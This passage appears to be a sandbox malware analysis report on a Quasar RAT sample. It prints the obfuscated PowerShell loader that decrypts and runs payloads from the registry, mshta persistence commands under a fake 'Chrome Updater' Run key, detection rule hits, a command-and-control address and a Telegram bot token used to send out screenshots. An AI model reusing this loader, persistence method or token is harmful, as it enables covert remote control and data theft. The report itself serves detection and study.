0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 
'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlBNKsBNKxBNKMBNKgBNK)BNK'.Replace('BNK', ''); $Zm4Vl=$wG2gl.CreateDecryptor(); $K78Uv=$Zm4Vl.TransformFinalBlock($gsleS, $u2Okr, $gsleS.Length); $Zm4Vl.Dispose(); $wG2gl.Dispose(); $K78Uv; } Invoke-Expression -WarningAction Inquire -InformationAction Ignore 'S20$S20XS20vS20IS20hS20uS20=S20[S20MS20iS20cS20rS20oS20sS20oS20fS20tS20.S20WS20iS20nS203S202S20.S20RS20eS20gS20iS20sS20tS20rS20yS20]S20:S20:S20CS20uS20rS20rS20eS20nS20tS20US20sS20eS20rS20.S20OS20pS20eS20nS20SS20uS20bS20KS20eS20yS20(S20$S20gS20YS20qS20oS20pS20,S20$S20dS20XS20sS203S20RS20)S20'.Replace('S20', ''); $xkuqv = $XvIhu.GetValue($QR3m4); $v7kJF = $XvIhu.GetValue($Q21ag); $v7kJF = juypb($v7kJF); $xkuqv = juypb($xkuqv); Invoke-Expression -InformationAction Ignore -Verbose 
'R1F$R1FER1FtR1FDR1FUR1FUR1F=R1F[R1FRR1FeR1FfR1FlR1FeR1FcR1FtR1FiR1FoR1FnR1F.R1FAR1FsR1FsR1FeR1FmR1FbR1FlR1FyR1F]R1F:R1F:R1FLR1FoR1FaR1FdR1F(R1F[R1FbR1FyR1FtR1FeR1F[R1F]R1F]R1F$R1FxR1FkR1FuR1FqR1FvR1F)R1F'.Replace('R1F', ''); $L68BO = $EtDUU.EntryPoint; $L68BO.Invoke($u2Okr,$gnS0E); Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire 'SAi$SAirSAikSAiESAitSAitSAi=SAi[SAiRSAieSAifSAilSAieSAicSAitSAiiSAioSAinSAi.SAiASAisSAisSAieSAimSAibSAilSAiySAi]SAi:SAi:SAiLSAioSAiaSAidSAi(SAi[SAibSAiySAitSAieSAi[SAi]SAi]SAi$SAivSAi7SAikSAiJSAiFSAi)SAi'.Replace('SAi', ''); $dY9Oo = $rkEtt.EntryPoint; $dY9Oo.Invoke($u2Okr,$gnS0E);}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 1076 cmdline: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 2832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 7404 cmdline: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
(5 of 13 entries shown)
Source | Rule | Description | Author | Strings
8.2.powershell.exe.225576fb380.0.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
8.2.powershell.exe.225576d3348.3.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
8.2.powershell.exe.225576d3348.3.raw.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
8.2.powershell.exe.2255fa80000.8.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
8.2.powershell.exe.2255fa80000.8.raw.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
(5 of 21 entries shown)

                      System Summary

Source: Process started
Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
Data: Command: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), CommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), ProcessId: 1076, ProcessName: mshta.exe

Source: Process started
Author: Michael Haag
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1076, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), ProcessId: 2832, ProcessName: powershell.exe

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", ProcessId: 7956, ProcessName: wscript.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wbem\WmiPrvSE.exe, ProcessId: 8116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Updater

Source: Registry Key set
Author: frack113, Florian Roth (Nextron Systems)
Data: Details: mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wbem\WmiPrvSE.exe, ProcessId: 8116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Updater

Source: Process started
Author: Michael Haag
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", ProcessId: 7956, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mr
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-02-11T17:32:38.586864+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.10 | 49797 | 149.154.167.220 | 443 | TCP

                      AV Detection

                      Source: Yara match, File source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.2% probability
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: 1.8.8
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: 193.124.205.6:443;
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: SubDir
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: Client.exe
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: 615456d8-1d6d-425c-ab75-75d0b24fbc45
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: Quasar Client Startup
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: adsforDex
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, String decryptor: Firewall
                      Source: unknown, HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49782 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49788 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49793 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
                      Source: Binary string: C:\Users\swagkek\source\repos\AntiVM\obj\Release\abc.pdb source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/gma.system.mousekeyhook]costura.gma.system.mousekeyhook.dll.compressed source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: powershell.exe, 00000008.00000002.2815168012.0000022560390000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256 source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      Source: Network traffic, Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.10:49797 -> 149.154.167.220:443
                      Source: unknown, DNS query: name: api.telegram.org
                      Source: global traffic, HTTP traffic detected: POST /bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdown HTTP/1.1 | Content-Type: multipart/form-data; boundary="9e5a8c58-a8d7-4adc-ac19-ba685bb25bb6" | Host: api.telegram.org | Content-Length: 692632 | Expect: 100-continue | Connection: Keep-Alive
                      Source: Joe Sandbox View, IP Address: 149.154.167.220
                      Source: Joe Sandbox View, IP Address: 172.67.74.152
                      Source: Joe Sandbox View, IP Address: 195.201.57.90
                      Source: Joe Sandbox View, ASN Name: AS-REGRU
                      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox View, JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
                      Source: unknown, DNS query: name: api.ipify.org
                      Source: unknown, DNS query: name: ipwho.is
                      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: ipwho.is | Connection: Keep-Alive
                      Source: unknown, TCP traffic detected without corresponding DNS query: 193.124.205.6
                      Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
                      Source: global traffic, DNS traffic detected: DNS query: ipwho.is
                      Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
                      Source: unknown, HTTP traffic detected: POST /bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdown HTTP/1.1 | Content-Type: multipart/form-data; boundary="9e5a8c58-a8d7-4adc-ac19-ba685bb25bb6" | Host: api.telegram.org | Content-Length: 692632 | Expect: 100-continue | Connection: Keep-Alive
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE285E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.ipify.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.org
                      Source: powershell.exe, 00000006.00000002.1592989522.000001BEFA143000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.v
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2899000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ipwho.is
                      Source: powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ns.a.0/sTy
                      Source: powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ns.adobe.hotosh
                      Source: powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1386901887.0000027F901DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
